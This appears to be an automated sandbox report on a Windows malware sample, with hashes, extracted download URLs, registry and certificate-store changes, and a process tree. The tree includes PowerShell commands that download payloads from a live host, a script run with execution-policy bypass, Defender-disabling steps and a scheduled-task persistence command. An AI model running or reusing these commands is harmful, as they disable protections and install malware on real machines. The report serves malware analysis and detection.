Analysis
-
max time kernel
136s -
max time network
112s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
29-06-2021 20:14
Static task
static1
Behavioral task
behavioral1
Sample
22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
Resource
win10v20210410
General
-
Target
22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
-
Size
3.1MB
-
MD5
52bbd67fdb23378f2ad43efb150abdc4
-
SHA1
9d138f1bf129473cb0d74c0d94ec8af2daa311c7
-
SHA256
22f93b97e4ee74c1af48cbdcf878a983cbe2fba7eefc5cd639814dc942cbaa8d
-
SHA512
7cf115c532466de78abd369ba202f738a3520f7c2b87c4847a8d8e59dc6e2c0d7cd9da1995d019690edd92b3ed154a9d659b7a6932c091e9c042192a66049755
Malware Config
Extracted
http://gamecardsy.com/ahmadtestupl/DefenderControl.exe
Extracted
http://gamecardsy.com/ahmadtestupl/DefenderKill.txt
Extracted
http://gamecardsy.com/ahmadtestupl/Defender.bat
Extracted
http://gamecardsy.com/ahmadtestupl/ff.ps1
Extracted
http://gamecardsy.com/ahmadtestupl/DefenderControl.txt
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
Setup.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" Setup.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 12 1824 powershell.exe 13 184 powershell.exe 14 3168 powershell.exe 15 2448 powershell.exe 16 2336 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
Setup.exeDefenderControl.exeDefenderControl.execonhostHost.execonhost.execonhost.exepid process 3996 Setup.exe 3228 DefenderControl.exe 2008 DefenderControl.exe 1932 conhostHost.exe 2024 conhost.exe 1576 conhost.exe -
Drops startup file 4 IoCs
Processes:
conhost.execonhostHost.execonhost.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe conhost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest conhostHost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe conhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe conhost.exe -
Processes:
DefenderControl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection DefenderControl.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
conhost.execonhost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run conhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\QYG44E4BTK = "\"C:\\ProgramData\\conhost.exe\"" conhost.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run conhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\QYG44E4BTK = "\"C:\\ProgramData\\conhost.exe\"" conhost.exe -
Drops file in System32 directory 2 IoCs
Processes:
DefenderControl.exedescription ioc process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol DefenderControl.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini DefenderControl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1920 schtasks.exe 3616 schtasks.exe -
Processes:
conhost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD conhost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f conhost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f conhost.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeDefenderControl.exepid process 1824 powershell.exe 1824 powershell.exe 1824 powershell.exe 184 powershell.exe 184 powershell.exe 184 powershell.exe 3168 powershell.exe 3168 powershell.exe 3168 powershell.exe 2448 powershell.exe 2448 powershell.exe 2448 powershell.exe 2336 powershell.exe 2336 powershell.exe 2336 powershell.exe 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe 3228 DefenderControl.exe 3228 DefenderControl.exe 3228 DefenderControl.exe 3228 DefenderControl.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Setup.exepid process 3996 Setup.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1824 powershell.exe Token: SeDebugPrivilege 184 powershell.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 2356 powershell.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exeDefenderControl.execonhostHost.exepid process 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe 3228 DefenderControl.exe 3228 DefenderControl.exe 3228 DefenderControl.exe 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe 1932 conhostHost.exe 1932 conhostHost.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.execonhostHost.exepid process 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe 1932 conhostHost.exe 1932 conhostHost.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.execmd.exepowershell.execmd.execonhostHost.execonhost.execonhost.exedescription pid process target process PID 3944 wrote to memory of 3996 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe Setup.exe PID 3944 wrote to memory of 3996 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe Setup.exe PID 3944 wrote to memory of 3996 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe Setup.exe PID 3944 wrote to memory of 1348 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe cmd.exe PID 3944 wrote to memory of 1348 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe cmd.exe PID 3944 wrote to memory of 1348 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe cmd.exe PID 1348 wrote to memory of 1824 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 1824 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 1824 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 184 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 184 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 184 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 3168 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 3168 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 3168 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2448 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2448 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2448 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2336 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2336 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2336 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2356 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2356 1348 cmd.exe powershell.exe PID 1348 wrote to memory of 2356 1348 cmd.exe powershell.exe PID 2356 wrote to memory of 2372 2356 powershell.exe cmd.exe PID 2356 wrote to memory of 2372 2356 powershell.exe cmd.exe PID 2356 wrote to memory of 2372 2356 powershell.exe cmd.exe PID 2372 wrote to memory of 3228 2372 cmd.exe DefenderControl.exe PID 2372 wrote to memory of 3228 2372 cmd.exe DefenderControl.exe PID 2372 wrote to memory of 3228 2372 cmd.exe DefenderControl.exe PID 2372 wrote to memory of 2008 2372 cmd.exe DefenderControl.exe PID 2372 wrote to memory of 2008 2372 cmd.exe DefenderControl.exe PID 2372 wrote to memory of 2008 2372 cmd.exe DefenderControl.exe PID 3944 wrote to memory of 1932 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe conhostHost.exe PID 3944 wrote to memory of 1932 3944 22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe conhostHost.exe PID 1932 wrote to memory of 2024 1932 conhostHost.exe conhost.exe PID 1932 wrote to memory of 2024 1932 conhostHost.exe conhost.exe PID 1932 wrote to memory of 2024 1932 conhostHost.exe conhost.exe PID 2024 wrote to memory of 1920 2024 conhost.exe schtasks.exe PID 2024 wrote to memory of 1920 2024 conhost.exe schtasks.exe PID 1576 wrote to memory of 3616 1576 conhost.exe schtasks.exe PID 1576 wrote to memory of 3616 1576 conhost.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe"C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Setup.exeC:\ProgramData\Setup.exe2⤵
- Modifies security service
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.exe', 'C:\Users\Public\DefenderControl.exe') }"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderKill.txt', 'C:\Users\Public\DefenderKill.lnk') }"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/Defender.bat', 'C:\Users\Public\Defender.bat') }"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/ff.ps1', 'C:\Users\Public\ff.ps1') }"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.txt', 'C:\Users\Public\DefenderControl.ini') }"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Public\ff.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\DefenderControl.exeDefenderControl.exe /D5⤵
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Public\DefenderControl.exeDefenderControl.exe /Q5⤵
- Executes dropped EXE
-
C:\ProgramData\conhostHost.exeC:\ProgramData\conhostHost.exe2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\conhost.exeC:\ProgramData/conhost.exe3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\ProgramData\conhost.exeC:\ProgramData\conhost.exe1⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe2⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Setup.exeMD5
1d3072caa9c82faea4ce0aff3c267d5f
SHA145431656c6d6e841c40bc8e80bed891193caff21
SHA25648efc1e775c88e01600b049e1e55831fefaea5d624d94892a6efaa632181e2fe
SHA5129d26e856ace8d48382d16346bff089439f7263b2c3f9c4dbc2cd8a797a704ab2d447df0e303b4a40cead274d0871aec1819ee81c40697efb7c759cae27ff76f5
-
C:\ProgramData\Setup.exeMD5
1d3072caa9c82faea4ce0aff3c267d5f
SHA145431656c6d6e841c40bc8e80bed891193caff21
SHA25648efc1e775c88e01600b049e1e55831fefaea5d624d94892a6efaa632181e2fe
SHA5129d26e856ace8d48382d16346bff089439f7263b2c3f9c4dbc2cd8a797a704ab2d447df0e303b4a40cead274d0871aec1819ee81c40697efb7c759cae27ff76f5
-
C:\ProgramData\conhost.exeMD5
fdbd7b1910d980cf7273796a0119d252
SHA147029af064a51454662909465ce38ee5cdcc62c7
SHA2563e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e
SHA512ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170
-
C:\ProgramData\conhost.exeMD5
fdbd7b1910d980cf7273796a0119d252
SHA147029af064a51454662909465ce38ee5cdcc62c7
SHA2563e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e
SHA512ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170
-
C:\ProgramData\conhost.exeMD5
fdbd7b1910d980cf7273796a0119d252
SHA147029af064a51454662909465ce38ee5cdcc62c7
SHA2563e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e
SHA512ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170
-
C:\ProgramData\conhost.exe.manifestMD5
c52800b49b2392de3d171515d13b8dd2
SHA19c59962bb6dbf5317c2684ed542c1c12a7778747
SHA256830bab8f10c1bd63d50e40e0137d9f26eac59fb8c4c4c53840c674e4793fcb66
SHA512c36c8f8080d617e058c2325fb7515059c6a5c1eb97e8c76440f44a8c1889d6616d2b8c92ac2d8b1e1754409912722d941aaeb4cb28eda1df08c148ed3497559a
-
C:\ProgramData\conhostHost.exeMD5
0556e409646df2fac47ab802d946c040
SHA1a1c3717b3dd3ae7def30e9b8bb6dc92979b57de9
SHA2567c46e3309671f2c70dc1c78b8bbeb132684d9f0014b6c4671e1d12cc75f8cd89
SHA51260b6659b24949c20b32bc7e1b7e3a40bde4d5b0b354e55ea1aeadab05be448b89e1df3d094c01aaf008c93dec91d168193e77a63e6a26189341441905bb09596
-
C:\ProgramData\start.batMD5
25768ca0dbfdaafacf64ec31c72ab131
SHA10c06ddcc9592a62f76589dfd51e29558ade3db23
SHA256dbb2aa62e7815bec646a0e160b658479040966edb3832c95e2647b0f3053df17
SHA5126dbfb8b3beddf8c788d5d2d0d1cdf754a5892a787192f3d0461ec277eefa849db0d26c17595c8d006d576f969d05e57022420c8f5a15d09e2306228579e70182
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
66382a4ca6c4dcf75ce41417d44be93e
SHA18132cbef1c12f8a89a68a6153ade4286bf130812
SHA256a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56
SHA5122bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
60c74628a1cb13a50251418ac89046e4
SHA1f7f554a5a9a4c481f8444d2a3dd25a2df46dbe87
SHA2564c848f3b15555e38dc778482a10dbff084184d9b5acb55fc9d643045efb3a7a8
SHA512afd92415ff1297fa5d6edbd30aba0a88b03ebd8e5bf33ffde1074b1dc4cd45fa1790ac77effade77820411a2ee336acf75e883dd30c2bf8198975dd9e6c37391
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
0891078a603b75d6f1304285223ebfad
SHA187012c3cce6846cd6f26170880b97ab1d94e3d68
SHA2568c8fd9f4d7895c2df42cae1c533c74b7312638f790a40a879206fce1cf2f1e51
SHA5126252ed193400f9db35a53618dae5bada66f3fce565d2bde49561b9dc2eb7f23f951dce39106edb4155a3eaa307f2702dfee166fee0c101ab9c30ca9f34edda49
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2d6a936f5bbbe4630176e1144278ca86
SHA1501b39603afa910e1676e7d5cff3628355ddda96
SHA256a7e7ef4d65691673b0682f35e5d1a119a8e66d4f780abc638dfdc57a34fea2a2
SHA5126684d117480eddb880af486a1edfc8c8b94112ca5605343dc869c906a366291c6af340571dd78b59d5820106d9573a8fd4d663c1fa4fbcb5e03becd032892c6f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2118eea3656220f07bcf33646946f91e
SHA17580da0f655cd0096ce89751a6f078ffd3138ae3
SHA2568ae15d384e8927d2fc7d1a19e2fc3657c2a509acfe4f848ba8b4ddeefca02867
SHA512a3b091e658338bbbe4843f7ea831161a95bc7ca5049e0480ac553f01fb56535be58992eb3e33d5492dd3cf9d892167411ca2fafda15c7211ba1eaf2a76f3c2da
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
7ac0a1bfae29dec3d721f6aa0c503d8c
SHA164a4f3ec3e124a827458738c0565dcab261b447b
SHA256302931fca9aebeb3a7065528036dcfdb57bf09358ee0605f25c135de55b9cd7e
SHA512f4d6b38945cec276f6cef00ba9ff7315011699166fd804d1227edd53e5c1bbb60cce90a1c10d16cbd6e5ea16b6aca657a52bb83b8be0e3fb4b63768250c5b9f6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exeMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Public\Defender.batMD5
6e18e46e1925e47c36dd5c936abc9ae7
SHA1eaaff27bde9261cd3ebaf569cf0f2566a2269464
SHA256989b2c6f7dab1f36a2c21fbc165fa73e6e5aa22a35c63aedfc41727fe5cfcd1e
SHA512de94f9f41e74c9b52265ab3d79c20df89ec946a9ab56ac5dcc3b5d5bca7bec5ac8eae506b3da6c592daeae6d3569e78c678bd52739e493f5490a65372157c0c1
-
C:\Users\Public\DefenderControl.exeMD5
139464919440e93e49c80cc890b90585
SHA10237408cdb74ad6b8d340cdf0d03c1b1f820ce17
SHA256ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4
SHA512d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c
-
C:\Users\Public\DefenderControl.exeMD5
139464919440e93e49c80cc890b90585
SHA10237408cdb74ad6b8d340cdf0d03c1b1f820ce17
SHA256ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4
SHA512d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c
-
C:\Users\Public\DefenderControl.exeMD5
139464919440e93e49c80cc890b90585
SHA10237408cdb74ad6b8d340cdf0d03c1b1f820ce17
SHA256ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4
SHA512d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c
-
C:\Users\Public\DefenderKill.lnkMD5
429eeaa2203c3a2e0f214283715ae07e
SHA1d63147618c6e92d5f38dc8816b633049f004c729
SHA256d1394f2f94909d3351b663b93c5eb6ca902d3f9f21f528adf1fd86eeba8f819c
SHA512a39e4f97f490e4255fd2356b7543e59771b1df98b502031b601d9125719c52e2af46a845e5627b27c0c5aa0e8587ab193dca4cf03d7c392eeb99a74c7257b76d
-
C:\Users\Public\ff.ps1MD5
76689eadd2c4317ec7d2f5abe74df2ba
SHA199ca8d374b94518ccf47fd4ec4aa202059ad254d
SHA25635c900caf65e96d12977782e9299b8d851e61ae9d0d6505f1a3a9c23cf0e79f0
SHA512315770b7e176a5c217ae59ee26f2bfa7b9bd79138501a5be36b48cad2453a998a6fc4d89c9bae9250348a777416d691a6d3f777dffe6e745e3bf4d402e9cd97e
-
memory/184-156-0x0000000006872000-0x0000000006873000-memory.dmpFilesize
4KB
-
memory/184-171-0x0000000006873000-0x0000000006874000-memory.dmpFilesize
4KB
-
